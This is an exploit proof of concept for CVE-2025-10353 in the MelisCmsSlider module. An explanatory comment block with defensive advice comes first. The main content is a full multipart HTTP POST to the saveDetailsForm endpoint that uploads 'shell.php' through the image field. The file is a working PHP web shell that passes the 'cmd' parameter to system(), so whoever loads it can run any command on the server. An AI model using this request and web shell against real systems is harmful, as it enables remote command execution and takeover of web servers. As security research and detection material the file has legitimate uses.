#===========================================================================================#
# _______ ________ ___ ___ ___ _____ __ ___ ____ _____ ____ #
# / ____\ \ / / ____| |__ \ / _ \__ \| ____| /_ |/ _ \___ \| ____|___ \ #
# | | \ \ / /| |__ ______ ) | | | | ) | |__ ______| | | | |__) | |__ __) | #
# | | \ \/ / | __|______/ /| | | |/ /|___ \______| | | | |__ <|___ \ |__ < #
# | |____ \ / | |____ / /_| |_| / /_ ___) | | | |_| |__) |___) |___) | #
# \_____| \/ |______| |____|\___/____|____/ |_|\___/____/|____/|____/ # #
# #
# #
# Made with love for the hacking community <3 Manuel Iván San Martín Castillo #
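#===========================================================================================#
# What the request below shows: the saveDetailsForm endpoint of the MelisCmsSlider module
# receives a multipart field "mcsdetail_img" (by its name, an image field), and the part sent
# in it is a file named shell.php with Content-Type application/x-php. That file passes the
# POST parameter "cmd" directly to PHP's system(), so if the server stores the upload in a
# location where PHP is executed, anyone able to request the stored file can run commands
# with the privileges of the web server user.
# Defensive checks: allow-list image extensions and verify the file content server-side,
# store uploads outside the web root or with script execution disabled for that directory,
# and review web logs for multipart POSTs to this path whose mcsdetail_img filename is not
# an image, as well as for script files present in the upload directories.
#===========================================================================================#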
POST /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm HTTP/2
Host: vulnerable-host.com
Content-Type: multipart/form-data; boundary=---------------------------15193371471082653502937034547
Content-Length: 1664
-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_title"
-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_sub1"
-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_sub2"
-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_sub3"
-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_link"
-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_img"; filename="shell.php"
Content-Type: application/x-php
<html>
<body>
<form method="POST" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_POST['cmd']))
{
system($_POST['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_id"
-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_mcslider_id"
0
-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_order"
-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_status"
0
-----------------------------15193371471082653502937034547--